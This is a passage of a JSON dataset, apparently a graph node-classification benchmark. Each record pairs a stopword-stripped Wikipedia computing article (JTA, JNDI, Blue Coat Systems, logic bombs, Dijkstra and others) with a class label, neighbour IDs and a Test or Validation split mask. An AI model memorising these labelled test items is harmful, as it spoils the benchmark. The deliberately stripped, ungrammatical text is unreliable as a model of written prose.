    "text": "Java_Transaction_API:java transaction api java transaction api jta one java enterprise edition java ee apis enables distributed transactions done across multiple x/open xa resources java environment jta specification developed java community process jsr 907 jta provides x/open xa architecture transaction manager transaction processing monitor tp monitor coordinates transactions across multiple resources databases message queues resource resource manager resource manager typically api manipulating resource example jdbc api work relational databases addition resource manager allows tp monitor coordinate distributed transaction resource managers finally application communicates tp monitor begin commit roll back transactions application also communicates individual resources using api modify resource jta api consists classes two java packages jta modelled x/open xa architecture defines two different apis demarcating transaction boundaries distinguishes application server ejb server application component provides interface used application server begin commit roll back transactions provides different interface used general client code servlet ejb manage transactions jta architecture requires resource manager must implement interface order managed tp monitor stated previously resource specific api instance java transaction api consists three elements high-level application transaction demarcation interface high-level transaction manager interface intended application server standard java mapping x/open xa protocol intended transactional resource manager interface provides application ability control transaction boundaries programmatically interface may used java client programs ejb beans method starts global transaction associates transaction calling thread transaction-to-thread association managed transparently transaction manager support nested transactions required usertransaction.begin method throws notsupportedexception calling thread already associated transaction transaction manager implementation support nested transactions transaction context propagation application programs provided underlying transaction manager implementations client server machines transaction context format used propagation protocol dependent must negotiated client server hosts example transaction manager implementation jts specification use transaction context propagation format specified corba ots 1.1 specification transaction propagation transparent application programs annotation provides application ability control transaction boundaries declaratively annotation applied class java ee specification defines managed bean includes cdi managed beans code sample illustrates usage transactional request scoped cdi managed bean transactional behavior configured via attribute annotation available options closely mirror ejb specification annotation provides application ability declare scope bean lives tied time given transaction active code sample illustrates usage transactionscoped request scoped cdi managed bean method foo first called managed instance examplebean subsequently method bar called number printed 0 1 method transaction therefore instance txscopedbean number 1 set call foo therefore seen call bar ejb servers required support usertransaction interface use ejb beans bean value annotation called bean-managed transactions bmt usertransaction interface exposed ejb components either ejbcontext interface using getusertransaction method directly via injection using general codice_1 annotation thus ejb application interface transaction manager directly transaction demarcation instead ejb bean relies ejb server provide support transaction work defined enterprise javabeans specification underlying interaction ejb server tm transparent application burden implementing transaction management ejb container server provider code sample illustrates usage usertransaction via bean-managed transactions ejb session bean alternatively usertransaction obtained sessioncontext note though example codice_2 annotation omitted jta transaction automatically started whenever codice_3 called automatically committed rolled back codice_3 exited making use usertransaction thus necessary ejb programming might needed specialized code usertransaction available codice_5 jta implementation installed environment",
    "neighbors": [
      9988,
      3341,
      5658,
      10526,
      10020,
      5677,
      6067,
      2234,
      2106,
      3517,
      6334,
      11582,
      3008,
      10048,
      1095,
      3278,
      3920,
      4959,
      4960,
      3558,
      1128,
      3560,
      9834,
      3954,
      8825
    ],
    "mask": "None"
  },
  {
    "node_id": 3519,
    "label": 5,
    "text": "Java_Naming_and_Directory_Interface:java naming directory interface java naming directory interface jndi java api directory service allows java software clients discover look data resources form java objects via name like java apis interface host systems jndi independent underlying implementation additionally specifies service provider interface spi allows directory service implementations plugged framework information looked via jndi may supplied server flat file database choice implementation used typical uses jndi include java rmi java ee apis use jndi api look objects network api provides spi portion allows support practically kind naming directory service including sun microsystems first released jndi specification march 10 1997. current version jndi 1.2 jndi java naming directory interface organizes names hierarchy name string com.example.ejb.mybean name also object implements codice_1 interface however string common way name object name bound object directory storing either object reference object directory service identified name jndi api defines context specifies look object initial context typically used starting point simplest case initial context must created using specific implementation extra parameters required implementation initial context used look name initial context analogous root top directory tree file system example creating initial context context used look previously bound names context example alternative code context object also configured adding jndi.properties file classpath containing initial context factory class name provider url code reduced shown context used look previously bound names context example attributes may attached special entries called directories directories enable searching objects associated attributes directories type context restrict name space much like directory structure file system",
    "neighbors": [
      4358,
      910,
      10526,
      9762,
      5031,
      5677,
      6074,
      10683,
      3517,
      5567,
      9665,
      2887,
      72,
      6860,
      3920,
      4960,
      2658,
      3558,
      3560,
      3561,
      3562,
      5872,
      9078,
      3705,
      6651,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 3520,
    "label": 4,
    "text": "Blue_Coat_Systems:blue coat systems blue coat systems company provided hardware software services designed cybersecurity network management 2016 acquired folded symantec company known cacheflow 2002 company broad security portfolio including hardware software services company best known web gateway appliances scan internet traffic security threats authenticate users manage encrypted traffic well products monitor filter employee internet activity also produced consumer products parental control software company products initially sold internet service providers later products intended large companies march 1996 company founded cacheflow inc. redmond washington michael malcolm computer scientist professor university waterloo joe pruskowski doug crow company initially raised 1 million seed money dozen angel investors company goal develop appliances would increase website speed storing frequently accessed web data cache october 1996 benchmark capital purchased 25 company 2.8 million equivalent price 87.5 cents per share february 1997 company raised 5.1 million december 1997 u.s. venture partners acquired 17 company 6 million 1997 company moved headquarters silicon valley january 1998 company released first product cacheflow 1000 cached website objects users likely use repeatedly increase load speed october 1999 cacheos operating system released april 1998 company released cacheflow 100 mid-1998 dot-com bubble company made first sales earning 809,000 three months investors started pushing initial public offering ipo march 1999 technology crossover ventures invested 8.7 million 7 company equivalent price 4.575 per share september 1999 company released cacheflow 500 list price 9,995 competitive review caching appliances pc magazine gave cacheflow 500 editor choice editor said excellent performance plug-and-go setup good management tools review noted noteworthy features dns caching object pipelining techniques allowed page data delivered parallel rather sequential streams early november 1999 marc andreessen invested 3.1 million shares price 11.04 per share november 19 1999 peak dot-com bubble company became public company via initial public offering raising 132 million shares rose fivefold first day trading however company profitable product unproven time company 3.6 million revenue 6.6 million losses prior 3 months company initially hoped price shares 11-13 raise 50 million due strong demand priced shares 26 one month later traded high 182 1999 board directors member andrew rachleff benchmark capital investor brought brian nesmith sold company ipsilon networks nokia 120 million chief executive officer 2000 introduced cacheflow server accelerator product family offloads content delivery tasks web servers tests network world found server accelerator 725 increased website load speed eight-fold cacheflow client accelerator 600 product family also introduced 2000 company first product family corporate networks caching web multimedia content directly corporate network revenues grew 7 million 1998 29 million 1999 97 million 2001 already 25 overall market caching 35 caching appliance market still profitable march 2000 company integrated products akamai technologies may 2000 company updated cacheflow os cache multimedia content including realnetworks realsystem microsoft windows media apple quicktime formats june 2000 company acquired springbank networks internet device company 180 million december 2000 company acquired entera digital content streaming company 440 million 2001 new features specifically streaming media introduced name ciq later 2001 company renamed blue coat systems focus security appliances simultaneously released sg800 appliance sat behind corporate firewalls filter website traffic viruses worms harmful software custom operating system called security gateway provided many security features partners like symantec trend micro company lost 97 value october 2000 march 2001 dot-com bubble burst company continued lose money 2002 several competing internet caching companies abandoned market due slow adoption caching technology cacheflow revenues came security products february 2002 company closed redmond wa office laid 60 workers around dozen redmond workers offered transfers sunnyvale ca office april 2002 company launched fifth version operating system security gateway 600/6000 series company newest product family range security features authentication internet use policies virus scanning content filtering bandwidth restrictions streaming video applications august 2002 company started adding security features also august 2002 company changed name blue coat systems new name intended evoke image police officer guard focusing internet security appliances products primarily used control monitor secure internet use employees example company could limit employee access online gaming video streaming well scan attachments viruses shift focus followed smaller losses revenues first eventually company growth losses 2002 rename 247 million half prior year losses 2003 company 250 employees 150 million annual revenue 2003 3 new products introduced small medium-sized businesses smbs 50 100 250 users bundles websense secure computing although websense partnership later least partially dismantled two vendors slinging mud var community followed second generation proxysg product family added security features instant messaging review eweek said new proxysg line effective easy deploy ongoing maintenance fees expensive october 2003 company acquired ositis software maker antivirus appliances 1.36 million july 2004 company acquired cerberian url filtering company 17.5 million 2005 company introduced anti-spyware appliance called spyware interceptor following year announced upcoming wan optimization products followed ssl-vpn security appliances secure remote connections 2005 company profitable first time 2006 company introduced free web-tool k9 web protection monitor internet traffic block certain websites identify phishing scams november 2008 review pc world gave 4.25 5 stars march 2006 company acquired permeo technologies end point security company 60 million june 2006 company acquired netcache assets netapp involved proxy caching 30 million june 2008 company acquired packeteer engaged wan optimization 268 million 2009 company introduced plugin packetshaper throttle applications spotify review packetshaper 12000 pro gave four five stars review said wo n't find superior wan traffic management anywhere else hardware platform could date considering price november 2009 company went restructuring included layoffs 280 1,500 employees closing facilities latvia new jersey netherlands february 2010 company acquired s7 software solutions research development firm based bangalore 5.25 million august 2010 michael j. borman named president ceo company august 2011 ceo michael borman fired failing meet performance goals replaced greg clark december 2011 thoma cressey bravo acquired company 1.3 billion march 2012 david murphy named chief operating officer president company december 2012 company acquired crossbeam systems maker x-series security appliances may 2013 company acquired solera networks involved big data security december 2013 company acquired norman shark anti malware firm 2014 elastica technology incorporated blue coat products audit subscription service merged blue coat appfeed proxysg gateways june 2015 company acquired perspecsys involved cloud security also march 2015 company integrated technologies acquisitions norman shark solera networks create cloud-based product family called global intelligence network also march 2015 company pressured security researcher raphaël rigo canceling talk syscan '15 although raphaël talk contain information vulnerabilities proxysg platform company still cited concerns talk going provide information useful ongoing security assessments proxysg blue coat canceling talk met harsh criticism various prominent security researchers professionals alike generally welcome technical information various security products widely used march 2015 bain capital acquired company thoma bravo 2.4 billion bain indicated hoped launch another ipo several months later anonymous sources said company looking investment banks purpose august 2015 company launched alliance ecosystem endpoint detection response edr share information security threats across vendors companies first channel program started march cloud ready partner program announced following april november 2015 company acquired elastica involved cloud security 280 million 2015 company 200 million annual profits 600 million revenues 50 increase 2011 june 2 2016 company filed plans initial public offering however june 13 2016 company abandoned ipo plans announced symantec agreed acquire company 4.65 billion acquisition completed august 1 2016 company products integrated symantec blue coat ceo greg clark named ceo symantec blue coat coo michael fey named president coo symantec blue coat devices known dual-use technology used defend corporate networks governments censor monitor public internet traffic appliances see types encrypted traffic block websites record website traffic october 2011 u.s. government examined claims made telecomix hacktivist group syria using blue coat systems products internet censorship telecomix released 54gb log data alleged taken 7 blue coat web gateway appliances depict search terms including israel proxy blocked country using appliances company later acknowledged systems used syria asserted equipment sold intermediaries dubai use iraqi governmental agency despite systems consistently sending heartbeat pings directly back blue coat company claimed monitoring logs identify country appliance communicating blue coat announced would halt providing updates support services systems operating syria april 2013 bureau industry security announced 2.8 million civil settlement computerlinks fzco dubai reseller violations export administration regulations related transfer syria blue coat products april 2013 blue coat systems personnel caught red handed monitoring tracking commenting edward snowden articles authored glenn greenwald guardian company devices also used block public viewing certain websites bahrain qatar u.a.e. among others 2013 citizen lab published 3 reports regarding company devices found countries known using technology violate human rights identified 61 countries using blue coat devices including known censoring surveilling citizens internet activity china egypt russia venezuela however remains unclear exactly technologies used experts say tools could empower repressive governments spy opponents",
    "neighbors": [
      7809,
      5512,
      265,
      1169,
      9233,
      7955,
      10772,
      10903,
      6297,
      5405,
      7967,
      2339,
      5924,
      1317,
      3495,
      6569,
      1708,
      2733,
      10745,
      8368,
      2870,
      11065,
      7739,
      2378,
      2634,
      4813,
      8398,
      2260,
      9817,
      7515,
      11104,
      9569,
      998,
      8170,
      8172,
      6894,
      6643,
      4725,
      10872,
      2041,
      8572,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 3521,
    "label": 4,
    "text": "Identity_management:identity management identity management idm also known identity access management iam framework policies technologies ensuring proper people enterprise appropriate access technology resources idm systems fall overarching umbrella security data management identity access management systems identify authenticate authorize individuals utilizing resources also hardware applications employees need access identity access management solutions become prevalent critical recent years regulatory compliance requirements become increasingly rigorous complex addresses need ensure appropriate access resources across increasingly heterogeneous technology environments meet increasingly rigorous compliance requirements terms identity management idm identity access management used interchangeably area identity access management identity-management systems products applications platforms manage identifying ancillary data entities include individuals computer-related hardware software applications idm covers issues users gain identity roles sometimes permissions identity grants protection identity technologies supporting protection e.g. network protocols digital certificates passwords etc. identity management idm task controlling information users computers information includes information authenticates identity user information describes information actions authorized access and/or perform also includes management descriptive information user information accessed modified managed entities typically include users hardware network resources even applications digital identity entity online presence encompassing personal identifying information pii ancillary information see oecd nist guidelines protecting pii interpreted codification identity names attributes physical instance way facilitates processing real-world context engineering online systems identity management involve four basic functions general model identity constructed small set axioms example identities given namespace unique identities bear specific relationship corresponding entities real world axiomatic model expresses pure identity sense model constrained specific application context general entity real virtual multiple identities identity encompass multiple attributes unique within given name space diagram illustrates conceptual relationship identities entities well identities attributes theoretical practical models digital identity given identity object consists finite set properties attribute values properties record information object either purposes external model operate model example classification retrieval pure identity model strictly concerned external semantics properties common departure pure identity practice occurs properties intended assure aspect identity example digital signature software token model may use internally verify aspect identity satisfaction external purpose extent model expresses semantics internally pure model contrast situation properties might externally used purposes information security managing access entitlement simply stored maintained retrieved without special treatment model absence external semantics within model qualifies pure identity model identity management defined set operations given identity model generally set capabilities reference practice identity management often expands express model contents provisioned reconciled among multiple identity models user access enables users assume specific digital identity across applications enables access controls assigned evaluated identity use single identity given user across multiple systems eases tasks administrators users simplifies access monitoring verification allows organizations minimize excessive privileges granted one user user access tracked initiation termination user access organizations deploy identity management process system motivation normally primarily manage set identities rather grant appropriate access rights entities via identities words access management normally motivation identity management two sets processes consequently closely related organizations continue add services internal users customers many services require identity management properly provide services increasingly identity management partitioned application functions single identity serve many even organization activities internal use identity management evolving control access digital assets including devices network equipment servers portals content applications and/or products services often require access extensive information user including address books preferences entitlements contact information since much information subject privacy and/or confidentiality requirements controlling access vital name implies identity federation comprises one systems federate user access allow users log based authenticating one systems participating federation trust several systems often known circle trust setup one system acts identity provider idp system acts service provider sp user needs access service controlled sp he/she first authenticates idp upon successful authentication idp sends secure assertion service provider saml assertions specified using mark language intended describing security assertions used verifier make statement relying party identity claimant saml assertions may optionally digitally signed addition creation deletion modification user identity data either assisted self-service identity management controls ancillary entity data use applications contact information location putting personal information onto computer networks necessarily raises privacy concerns absent proper protections data may used implement surveillance society social web online social networking services make heavy use identity management helping users decide manage access personal information become issue broad concern identity theft happens thieves gain access identity information personal details needed get access bank account research related management identity covers disciplines technology social sciences humanities law within seventh research framework programme european union 2007 2013 several new projects related identity management started picos project investigates develops state-of-the-art platform providing trust privacy identity management mobile communities primelife develops concepts technologies help individuals protect autonomy retain control personal information irrespective activities swift focuses extending identity functions federation network addressing usability privacy concerns leverages identity technology key integrate service transport infrastructures benefit users providers ongoing projects include future identity information society fidis guide prime academic journals publish articles related identity management include less specialized journals publish topic instance special issues identity iso specifically iso/iec jtc1 sc27 security techniques wg5 identity access management privacy techniques conducting standardization work identity management elaboration framework identity management including definition identity-related terms published standards current work items includes following organization normally role department responsible managing schema digital identities staff objects represented object identities object identifiers oid",
    "neighbors": [
      2818,
      11653,
      10887,
      2315,
      3086,
      9744,
      1169,
      9745,
      3732,
      4760,
      7960,
      6811,
      8859,
      6563,
      10020,
      8998,
      1961,
      6064,
      2737,
      7729,
      10801,
      10804,
      1334,
      7352,
      5433,
      7994,
      9403,
      10553,
      957,
      3521,
      9665,
      579,
      5573,
      838,
      7368,
      210,
      6098,
      9682,
      1368,
      90,
      6750,
      2143,
      4575,
      2154,
      11244,
      6381,
      8174,
      5108,
      4213,
      5624,
      5373,
      2558,
      2047
    ],
    "mask": "Test"
  },
  {
    "node_id": 3522,
    "label": 6,
    "text": "Directory_(computing):directory computing computing directory file system cataloging structure contains references computer files possibly directories many computers directories known folders drawers analogous workbench traditional office filing cabinet files organized storing related files directory hierarchical file system one files directories organized manner resembles tree directory contained inside another directory called subdirectory terms parent child often used describe relationship subdirectory directory cataloged latter parent top-most directory filesystem parent called root directory historically even modern embedded systems file systems either support directories flat directory structure meaning subdirectories supported group top-level directories containing files modern systems directory contain mix files subdirectories reference location directory system called path many operating systems programs associated working directory execute typically file names accessed program assumed reside within directory file names specified explicit directory name operating systems restrict user access home directory project directory thus isolating activities users early versions unix root directory home directory root user modern unix usually uses another directory /root purpose keeping unix philosophy unix systems treat directories type file name folder presenting analogy file folder used offices used hierarchical file system design electronic recording machine accounting erma mark 1 published 1958 well xerox star used almost modern operating systems desktop environments folders often depicted icons visually resemble physical file folders difference directory file system concept graphical user interface metaphor used represent folder example microsoft windows uses concept special folders help present contents computer user fairly consistent way frees user deal absolute directory paths vary versions windows individual installations many operating systems also concept smart folders virtual folders reflect results file system search operation folders represent directory file hierarchy many email clients allow creation folders organize email folders corresponding representation filesystem structure one referring container documents term folder appropriate term directory refers way structured list document files folders stored computer distinction due way directory accessed unix systems /usr/bin/ usually referred directory viewed command line console accessed graphical file manager users may sometimes call folder operating systems support hierarchical filesystems practically modern ones implement form caching ram recent path lookups unix world usually called directory name lookup cache dnlc although called dcache linux local filesystems dnlc entries normally expire pressure recent entries network file systems coherence mechanism necessary ensure entries invalidated clients",
    "neighbors": [
      2432,
      3330,
      1801,
      5514,
      6797,
      7053,
      9743,
      2194,
      6674,
      2198,
      3863,
      11675,
      6812,
      6813,
      8988,
      9762,
      2339,
      9507,
      5158,
      1193,
      2479,
      7983,
      8879,
      11568,
      52,
      437,
      1844,
      823,
      2485,
      8631,
      9533,
      8767,
      3394,
      1603,
      8517,
      7495,
      4298,
      10314,
      6476,
      7244,
      2383,
      2129,
      3793,
      5969,
      10068,
      1109,
      6358,
      5975,
      9946,
      9819,
      1509,
      6120,
      2281,
      8298,
      8301,
      6126,
      7663,
      9840,
      2417,
      3571,
      2804,
      5492,
      5619,
      7540,
      9204,
      9972,
      10867,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 3523,
    "label": 4,
    "text": "Tõnu_Samuel:tõnu samuel tõnu samuel born 3 july 1972 estonian hacker commonly cited mainstream media topics regarding network security samuel born tallinn 1979 1988 attended tallinn secondary science school 1990–1992 took courses business financial management career programmer began 1991 working estonian ministry communication 2011 samuel moved work japan lived 10 years räpina southeastern estonia",
    "neighbors": [
      939,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 3524,
    "label": 9,
    "text": "Xerox_Escape_Sequence:xerox escape sequence xerox escape sequence xes page description language pdl developed xerox corporation introduced 2700 laser printers 1982 xes offers similar capabilities hewlett-packard printer command language pcl first appeared 1984 xes supported xerox laser printers including 2700 3700 4011 4030 4045 4197 4213 4235 4700 xes sometimes known udk user defined key character introduces printer command usually escape character esc",
    "neighbors": [
      5384,
      8262,
      8763,
      6830
    ],
    "mask": "None"
  },
  {
    "node_id": 3525,
    "label": 4,
    "text": "Logic_bomb:logic bomb logic bomb piece code intentionally inserted software system set malicious function specified conditions met example programmer may hide piece code starts deleting files salary database trigger ever terminated company software inherently malicious viruses worms often contain logic bombs execute certain payload pre-defined time condition met technique used virus worm gain momentum spread noticed viruses attack host systems specific dates friday 13th april fools day trojans computer viruses activate certain dates often called time bombs considered logic bomb payload unwanted unknown user software example trial programs code disables certain functionality set time normally regarded logic bombs reported 1982 trans-siberian pipeline incident occurred logic bomb later reported story may hoax kgb operative reported stolen plans sophisticated control system software canadian firm use siberian pipeline central intelligence agency cia supposedly tipped documents farewell dossier company insert logic bomb program sabotage purposes",
    "neighbors": [
      2432,
      899,
      3843,
      5636,
      10756,
      9607,
      9356,
      9488,
      3473,
      8978,
      10392,
      5373,
      5246,
      4892,
      5404,
      2975,
      2084,
      2213,
      8998,
      939,
      3629,
      9646,
      3887,
      7855,
      818,
      1970,
      10110,
      5433,
      7739,
      6588,
      3262,
      9791,
      7368,
      9160,
      5325,
      10448,
      2262,
      855,
      6360,
      9688,
      3290,
      5722,
      2780,
      4956,
      7515,
      11351,
      9569,
      2275,
      3941,
      6373,
      107,
      11244,
      2041,
      10492,
      5245,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3526,
    "label": 2,
    "text": "Seventh_Edition_Unix_terminal_interface:seventh edition unix terminal interface seventh edition unix terminal interface generalized abstraction comprising application programming interface programs set behavioural expectations users terminal historically available seventh edition unix largely superseded posix terminal interface terminal interface provided seventh edition unix unix/32v also presented bsd version 4 old terminal driver simple one largely geared towards teletypewriters terminals input entered line time terminal driver operating system terminals providing simple line editing capabilities buffer maintained kernel editing took place applications reading terminal input would receive contents buffer key pressed terminal end line editing key sent terminal system would erase kill entire current contents editing buffer would normally displayed symbol followed newline sequence move print position fresh blank line key sent terminal system would erase last character end editing buffer would normally displayed symbol users would recognize denoting rubout preceding character teletypewriters physically capable erasing characters printed paper programming point view terminal device transmit receive baud rates erase kill characters performed line editing explained interrupt quit characters generating signals processes terminal controlling terminal start stop characters used software flow control end file character acting like carriage return except discarded buffer codice_1 system call therefore potentially causing zero-length result returned various mode flags determining whether local echo emulated kernel terminal driver whether modem flow control enabled lengths various output delays mapping carriage return character three input modes three input modes terminals seventh edition unix posix terminal interface modes superseded system two input modes canonical non-canonical handling signal-generating special characters posix terminal interface independent input mode separately controllable seventh edition unix terminal job control process group considered considered nowadays process system either single controlling terminal controlling terminal process inherits controlling terminal parent controlling terminal acquired process controlling terminal codice_2s terminal device file n't already controlling terminal process processes controlling terminal part single process group programmatic interface querying modifying modes control characters codice_3 system call replaced codice_4 codice_5 system calls sixth edition unix although erase kill characters modifiable defaults many years seventh edition development inertia meant pre-set defaults terminal device drivers many unix systems altered terminal device settings part login process system login scripts ran user entered username password mistakes login password prompts corrected using historical editing key characters inherited teletypewriter terminals symbolic constants whose values fixed defined data structure definitions programmatic interface defined codice_6 system header codice_3 operations follows one data structure used terminal system calls codice_9 structure whose c programming language definition follows unlike posix terminal interface seventh edition unix terminal interface recorded input output baud rates directly data structure input output speeds codice_11 codice_12 fields dec dh-11 numbers 0 15 represented symbolic constants ascending order codice_13 codice_14 codice_15 codice_16 codice_17 codice_18 codice_19 codice_20 codice_21 codice_22 codice_23 codice_24 codice_25 codice_26 codice_27 codice_28 baud rate name last two external external b setting baud rate zero forced terminal driver hang modem terminal modem device codice_29 codice_30 fields simply character values erase kill characters respectively defaulting ascii values respectively codice_31 field specified various input output control flags following table one data structure used terminal system calls codice_32 structure whose c programming language definition follows values fields values various programmatically configurable special characters -1 value field disabled recognition terminal driver",
    "neighbors": [
      9444,
      4423,
      5771,
      8395,
      4750,
      2035,
      7540,
      9151
    ],
    "mask": "None"
  },
  {
    "node_id": 3527,
    "label": 2,
    "text": "Microsoft_Venus:microsoft venus microsoft venus aborted venture microsoft low-end personal computing market people republic china product set-top operating system designed work low-end televisions somewhat similar msn tv united states announced then-microsoft chairman bill gates march 10 1999 shenzhen made available january 2000 never made microsoft lab however slowly dying less year announcement relatively little known microsoft venus since project never made beyond prototype stage designed exclusive people republic china known project appears show microsoft designed venus response largely untapped chinese computing market low-end set-top box designed combination internet accessibility basic features personal computer rudimentary word processor hoped tap market gaining market share profit world fastest-growing economy process despite initial support chinese government — included limited discounts assorted subsidies — lucrative distribution agreements acer philips lenovo companies planned venture faced many problems largest massive cost overrun units reported sell 3,000 yuan us 360 time large sum general chinese public 1999 progressed 2000 began chinese government relations microsoft continued sour production costs venus tension reached fever pitch january 2000 chinese government ordered windows 2000 uninstalled ministerial computers opting use locally produced red flag linux instead january 2000 passed without venus release product remained vaporware microsoft aforementioned brief showdown chinese government month talk venus appears ceased news media venus never released went microsoft attempt selling low-cost computing chinese masses microsoft first attempt bringing computing chinese masses failure later events proved favorable company lenovo purchase ibm windows-based computing division 2005 gave consumer electronics corporation partially owned chinese government strong presence windows computing market home china abroad persisted since initial acquisition however lenovo computers full-fledged pcs bear strong resemblance all-in-one television component microsoft envisioned becoming large success china according reuters account initial unveiling venus prototype box intended combine internet browser rudimentary word processing graphic design suite cd player one set-top television component gates touted computer learning capabilities ability intended combined contract forty chinese governmental ministries produce application known government online would served stated purpose bringing chinese bureaucracy closer masses microsoft reportedly intended venus boxes run special version windows ce fine-tuned display television sets exact processor speeds never released microsoft believed comparable low-end windows computers time",
    "neighbors": [
      4356,
      11524,
      6797,
      782,
      1935,
      10900,
      11549,
      7970,
      1832,
      6827,
      7983,
      3890,
      8757,
      321,
      4289,
      9033,
      10957,
      4051,
      11221,
      11605,
      11103,
      10338,
      617,
      8681,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 3528,
    "label": 4,
    "text": "CERIAS:cerias center education research information assurance security cerias purdue university united states center research education areas information security computing communication infrastructures research focused following areas cerias one world ’ leading academic institutions area one nsf original seven centers academic excellence information assurance education cerias rooted coast research group computer operations audit security technology established 1991 computer sciences department purdue research groups professors eugene spafford samuel wagstaff jr.. coast initially funded sun microsystems schlumberger bell northern research bnr nortel hughes research laboratories coast subsumed cerias january 1 1999",
    "neighbors": [
      4448,
      9665,
      5350,
      10928,
      4435,
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3529,
    "label": 9,
    "text": "Edsger_W._Dijkstra:edsger w. dijkstra edsger wybe dijkstra 11 may 1930 – 6 august 2002 dutch systems scientist programmer software engineer science essayist pioneer computing science theoretical physicist training worked programmer mathematisch centrum amsterdam 1952 1962 university professor much life dijkstra held schlumberger centennial chair computer sciences university texas austin 1984 retirement 1999 professor mathematics eindhoven university technology 1962–1984 research fellow burroughs corporation 1973–1984 one influential figures computing science founding generation dijkstra helped shape new discipline engineering theoretical perspective fundamental contributions cover diverse areas computing science including compiler construction operating systems distributed systems sequential concurrent programming programming paradigm methodology programming language research program design program development program verification software engineering principles graph algorithms philosophical foundations computer programming computer science many papers source new research areas several concepts problems standard computer science first identified dijkstra bear names coined foremost opponent mechanizing view computing science refuted use concepts 'computer science 'software engineering umbrella terms academic disciplines mid-1960s computer programming considered art craft scientific discipline harlan mills words 1986 programming 1970s regarded private puzzle-solving activity writing computer instructions work program late 1960s computer programming state crisis dijkstra one small group academics industrial programmers advocated new programming style improve quality programs dijkstra background mathematics physics one driving forces behind acceptance computer programming scientific discipline coined phrase structured programming 1970s became new programming orthodoxy ideas structured programming helped lay foundations birth development professional discipline software engineering enabling programmers organize manage increasingly complex software projects bertrand meyer 2009 noted revolution views programming started dijkstra iconoclasm led movement known structured programming advocated systematic rational approach program construction structured programming basis done since programming methodology including object-oriented programming academic study concurrent computing started 1960s dijkstra 1965 credited first paper field identifying solving mutual exclusion problem also one early pioneers research principles distributed computing foundational work concurrency semaphores mutual exclusion deadlock deadly embrace finding shortest paths graphs fault-tolerance self-stabilization among many contributions comprises many pillars upon field distributed computing built shortly death 2002 received acm podc influential-paper award distributed computing work self-stabilization program computation annual award renamed dijkstra prize edsger w. dijkstra prize distributed computing following year honor prize sponsored jointly acm symposium principles distributed computing podc eatcs international symposium distributed computing disc recognizes individual larger influence research principles distributed computing edsger w. dijkstra born rotterdam father chemist president dutch chemical society taught chemistry secondary school later superintendent mother mathematician never formal job dijkstra considered career law hoped represent netherlands united nations however graduating school 1948 parents suggestion studied mathematics physics theoretical physics university leiden early 1950s electronic computers novelty dijkstra stumbled career quite accident supervisor professor a. haantjes met adriaan van wijngaarden director computation department mathematical center amsterdam offered dijkstra job officially became netherlands first programmer march 1952 time dijkstra remained committed physics working leiden three days week increasing exposure computing however focus began shift recalled dijkstra married maria ria c. debets 1957 required part marriage rites state profession stated programmer unacceptable authorities profession time netherlands 1959 received phd university amsterdam thesis entitled 'communication automatic computer devoted description assembly language designed first commercial computer developed netherlands x1 thesis supervisor van wijngaarden 1952 1962 dijkstra worked mathematisch centrum amsterdam worked closely bram jan loopstra carel s. scholten hired build computer mode interaction disciplined would first decide upon interface hardware software writing programming manual hardware designers would faithful part contract dijkstra programmer would write software nonexistent machine two lessons learned experience importance clear documentation program debugging largely avoided careful design dijkstra formulated solved shortest path problem demonstration official inauguration armac computer 1956 but—because absence journals dedicated automatic computing—did publish result 1959 mathematical center dijkstra colleague developed compiler programming language algol 60 profound influence later thinking programming scientific activity zonneveld completed implementation first algol 60 compiler august 1960 year compiler produced another group 1962 dijkstra moved eindhoven later nuenen south netherlands became professor mathematics department eindhoven university technology university separate computer science department culture mathematics department particularly suit dijkstra tried build group computer scientists could collaborate solving problems unusual model research mathematics department late 1960s built operating system named university known technische hogeschool eindhoven influenced designs subsequent operating systems use software based paged virtual memory dijkstra joined burroughs corporation company known time production computers based innovative hardware architecture research fellow august 1973 duties consisted visiting company research centers times year carrying research smallest burroughs research facility namely study second floor house nuenen fact dijkstra research fellow burroughs corporation worked home occasionally travelling branches united states result reduced appointment university one day week day tuesday soon became known day famous 'tuesday afternoon club seminar discussed colleagues scientific articles looking aspects – notation organisation presentation language content etc shortly moved 1984 university texas austin usa new 'branch tuesday afternoon club emerged austin burroughs years saw prolific output research articles wrote nearly 500 documents ewd series described technical reports private circulation within select group dijkstra accepted schlumberger centennial chair computer science department university texas austin 1984 dijkstra worked austin retirement november 1999 mark occasion celebrate forty-plus years seminal contributions computing science department computer sciences organized symposium took place 70th birthday may 2000 dijkstra wife returned austin original house nuenen netherlands found months live said wanted retire austin texas die netherlands dijkstra died 6 august 2002 long struggle cancer wife maria ria debets survived three children marcus femke computer scientist rutger m. dijkstra early theoretical pioneer many research areas computing science dijkstra helped shape new discipline engineering academic perspective many papers source new research areas many concepts standard computer science first identified dijkstra and/or bear names coined several important problems also first formulated solved 1994 survey thousand professors computer science conducted obtain list 38 influential scholarly papers field dijkstra author five papers forty-plus years computing scientist included positions academia industry dijkstra made numerous seminal contributions many areas computing science including compiler construction operating systems concurrent programming concurrent computing distributed programming distributed computing programming paradigm methodology programming language research program design program development program verification software engineering principles algorithm design philosophical foundations computer programming computer science addition dijkstra intensely interested teaching computer science relationships academic computing science software industry dijkstra algorithmic work especially graph algorithms concurrent algorithms distributed algorithms plays important role many areas computing science according leslie lamport 2002 dijkstra started field concurrent distributed algorithms 1965 cacm paper solution problem concurrent programming control first stated solved mutual exclusion problem lamport explains paper probably podc exists ... remains day influential paper field win podc influential paper award reflects artificial separation concurrent distributed algorithms–a separation never existed dijkstra work 1959 dijkstra published 3-page article note two problems connexion graphs algorithm find shortest path graph two given nodes called dijkstra algorithm impact next 40 years summarised article mikkel thorup 'undirected single source shortest paths positive integer weights linear time 1999 since 1959 theoretical developments sssp single-source shortest paths general directed undirected graphs based dijkstra algorithm dijkstra algorithm used spf shortest path first used routing protocols ospf is-is various modifications dijkstra algorithm proposed many authors using heuristics reduce run time shortest path search one used heuristic algorithms a* search algorithm first described peter hart nils nilsson bertram raphael stanford research institute 1968 main goal reduce run time reducing search space dijkstra thought shortest path problem working mathematical center amsterdam 1956 programmer demonstrate capabilities new computer called armac objective choose problem well answer would produced computer non-computing people could understand designed shortest path algorithm 20 minutes without aid paper pen later implemented armac slightly simplified transportation map 64 cities netherlands 6 bits would suffice represent city algorithm recalled interview published 2001 year later came across another problem hardware engineers 